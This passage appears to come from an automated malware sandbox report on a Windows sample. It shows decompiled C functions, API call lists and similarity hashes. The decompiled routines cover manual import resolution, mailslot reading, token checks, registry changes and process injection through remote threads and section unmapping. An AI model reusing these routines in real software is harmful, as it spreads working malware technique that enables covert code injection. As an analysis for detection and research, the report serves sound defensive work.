				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E4003, Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 105 Total matches: 5memorystring
Similarity
  • Total matches: 5
  • API ID: VirtualAllocVirtualFreelstrcpynmemcpy
  • String ID: Apr 14 2018$pnls$pnls
  • API String ID: 1980370899-1480254790
  • Opcode ID: d2d7eac804a3eb49e30a17e266a0af7cd79fc0f9b8674edd69bebf188f29996b
  • Instruction ID: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
  • Opcode Fuzzy Hash: 96F02D09194ED842E97E18906592B52B7063705617CADD526598378527AF5032138A6F
  • Instruction Fuzzy Hash: e283ea499afca555231b635cf02cbd7bbcdf6d6cb8eed8c9164b2fbef648550f
APIs
  • lstrcpyn.KERNEL32(002E1776,002E61FC,00000008,002E618C,0000000C,00000000,?,?,?,002E1776,?,?,002E7494), ref: 002E4031
  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,002E1776,?,?,002E7494), ref: 002E40A4
  • memcpy.NTDLL(?,00000000,?,?,002E7494,00000001,?,?,?,002E1776,?,?,002E7494), ref: 002E40ED
  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,002E7494,00000001,?,?,?,002E1776,?), ref: 002E4106
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3F3A, Relevance: 10.6, APIs: 7, Instructions: 75 Total matches: 204
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E22D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E2427, Relevance: 9.1, APIs: 6, Instructions: 78 Total matches: 154threadinjection
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 002E3368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Function 00401000, Relevance: 6.0, APIs: 4, Instructions: 16 Total matches: 141memorythread
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed
				_t2 = HeapCreate(0, 0x10000, 0); // executed
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed
				}
				ExitThread(_t3);
			}






0x00401012
0x00401014
0x0040101c
0x00401026
0x0040101e
0x0040101f
0x0040101f
0x0040102d

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Function 002E1186, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56 Total matches: 157memory
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
